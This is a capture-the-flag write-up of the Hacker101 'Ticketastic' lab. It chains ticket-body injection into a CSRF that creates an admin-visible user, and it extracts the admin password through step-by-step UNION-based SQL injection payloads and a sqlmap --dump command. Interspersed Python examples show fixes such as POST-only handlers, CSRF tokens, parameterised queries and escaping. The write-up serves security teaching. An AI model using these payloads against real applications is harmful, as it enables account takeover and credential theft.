CTF — Hacker101 — Ticketastic

Ravid Mazon
CyberX


This one was a pretty fun and straightforward CTF; I enjoyed it a lot.

So without further ado, let's jump into it.

FLAG0

From playing with the demo instance, I realized that after logging in as admin (with admin/admin) and trying to add a new user, the new user's credentials are passed via a GET request, in the URL.

It looked something like this:

GET to xxxxx/yyyyy/newUser?username=user&password=pass&password2=pass

Well, that's really bad practice for passing credentials, but we need more than that to get the flag here.

Trying to submit a ticket, I found that there was room for XSS, HTML injection and the like. The payload executed after logging in.

The problem is that, contrary to the demo mode, where we could log in with admin/admin and add as many new users as we wanted, in the live instance we don't know the admin password, so we can neither log in nor add new users.

So we need to figure out how to log in without the admin password.

Knowing that there was no sanitization at all of the body when submitting a new ticket, I tried to inject a malicious link and see what happens.

A successful injection

So if there is no sanitization at all, and I can inject any link I want, we can use CSRF here! Let's try to add a new user.

PoC

After the request was made by us, we need to log in with the credentials of the user we just added via CSRF, in this case user1 / password1.

Trying to log in, and YES! I'm in and can see all the tickets that were submitted, including the ticket “Flag Won’t Work”, in which we can find our first flag.
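The two weaknesses chained above (a state-changing newUser endpoint that accepts GET with credentials in the query string, plus an unescaped ticket body that lets an injected link trigger it) each have a standard fix. The following is an added example written for this write-up, not code from Hacker101 or the Ticketastic app; it models a hardened newUser handler in plain Python with an in-memory session store and assumes a hypothetical session/CSRF design of its own.

```python
import hmac
import secrets
from html import escape
from urllib.parse import parse_qs, urlparse

# Constructed in-memory state standing in for the app's session store and user table.
SESSIONS = {}                 # session_id -> {"user": ..., "csrf": ...}
USERS = {"admin": "admin"}    # demo credentials as described in the write-up (constructed)


def start_session(username):
    """Create a session with a per-session CSRF token (assumed design, not the app's)."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": username, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid):
    """Token the server embeds in its own newUser form; a forged cross-site request lacks it."""
    return SESSIONS[sid]["csrf"]


def handle_new_user(method, url, body, sid):
    """Return (status, message) for a newUser request.

    Hardened rules:
      * only POST may create a user: the GET .../newUser?username=... seen in the
        write-up is exactly what an injected link can trigger from the admin's browser
      * the body must carry the session's CSRF token, compared in constant time
      * credentials are read from the body, never from the query string
    """
    if sid not in SESSIONS:
        return 401, "not logged in"
    if method != "POST":
        return 405, "state-changing request must be POST"
    query = parse_qs(urlparse(url).query)
    if "username" in query or "password" in query:
        return 400, "credentials in query string rejected"
    form = {k: v[0] for k, v in parse_qs(body).items()}
    token = form.get("csrf", "")
    if not hmac.compare_digest(token.encode(), SESSIONS[sid]["csrf"].encode()):
        return 403, "bad CSRF token"
    username = form.get("username")
    password, password2 = form.get("password"), form.get("password2")
    if not username or not password or password != password2:
        return 400, "bad form"
    USERS[username] = password    # a real app would store a password hash here
    return 201, f"user {username} created"


def render_ticket_body(text):
    """Escape ticket text before placing it in HTML, removing the injection foothold."""
    return escape(text, quote=True)
```

With the GET form of the request refused outright and the token check on POST, the injected link from the ticket body can no longer create an account even when the admin views the ticket; escaping the body closes the injection point itself.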

FLAG1

For this flag, I fooled around a bit and found that the ‘id’ parameter in “ticket?id=x” is injectable (SQLi).

We need to find the admin’s password, and we can do it in two different ways: the manual way or the automated way.

1. Manual SQL injection

Testing TRUE vs FALSE queries:

ticket?id=1 AND 1=1
ticket?id=1 AND 1=2

Finding the number of columns in the query:

ticket?id=1 AND 1=1 ORDER BY 3

ticket?id=1.1 UNION SELECT 1,2,3 -- -

Finding the table name:

ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() -- -

Found ‘users’, finding columns:

ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME='users' -- -

And at the end, finding the password for ‘admin’:

ticket?id=1.1 UNION SELECT 1,password,3 FROM users WHERE username='admin' -- -
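The root cause behind the whole chain above is that the `id` value is pasted into the SQL text. The following is an added example, not code from the challenge; it uses an in-memory SQLite database with a constructed `tickets`/`users` schema (the real schema is unknown, and the page's enumeration steps are MySQL-specific, so only the final UNION payload is reproduced) to show the concatenated query leaking the admin row while the parameterised and validated versions treat the same input as plain data.

```python
import sqlite3

# Constructed sample data standing in for the challenge's tables (not the real schema).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        CREATE TABLE tickets (id INTEGER, title TEXT, body TEXT);
        INSERT INTO users VALUES (1, 'admin', 'constructed-admin-secret');
        INSERT INTO tickets VALUES (1, 'Flag Won''t Work', 'constructed ticket body');
    """)
    return db


# The write-up's final payload, reproduced to compare what each query builder does with it.
PAYLOAD = "1.1 UNION SELECT 1,password,3 FROM users WHERE username='admin' -- "


def ticket_vulnerable(db, ticket_id):
    """String concatenation: the id becomes part of the SQL text (the bug behind FLAG1).
    The 1.1 makes the first SELECT match nothing, so only the UNION'd users row comes back."""
    sql = "SELECT id, title, body FROM tickets WHERE id = " + ticket_id
    return db.execute(sql).fetchall()


def ticket_safe(db, ticket_id):
    """Parameterised query: the id is bound as a value, so 'UNION' is never parsed as SQL."""
    return db.execute(
        "SELECT id, title, body FROM tickets WHERE id = ?", (ticket_id,)
    ).fetchall()


def is_valid_ticket_id(raw):
    """Input validation in front of the query: a ticket id is a positive integer, nothing else."""
    return raw.isdigit()


def ticket_validated(db, raw):
    """Belt and braces: reject malformed ids before they reach the database at all."""
    if not is_valid_ticket_id(raw):
        raise ValueError("ticket id must be a positive integer")
    return ticket_safe(db, int(raw))
```

Note that the leaked value is the password itself; even with the query fixed, storing a password hash rather than the plaintext would have kept a leak of the `users` table from handing over a working login.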

2. Automating the process — using SQLMap

Saving the GET request from Burp into a text file (in this case, sqlr.txt).

Then, using SQLMap: sqlmap -r sqlr.txt --dump

And voilà! 5 min later, we get the flag.
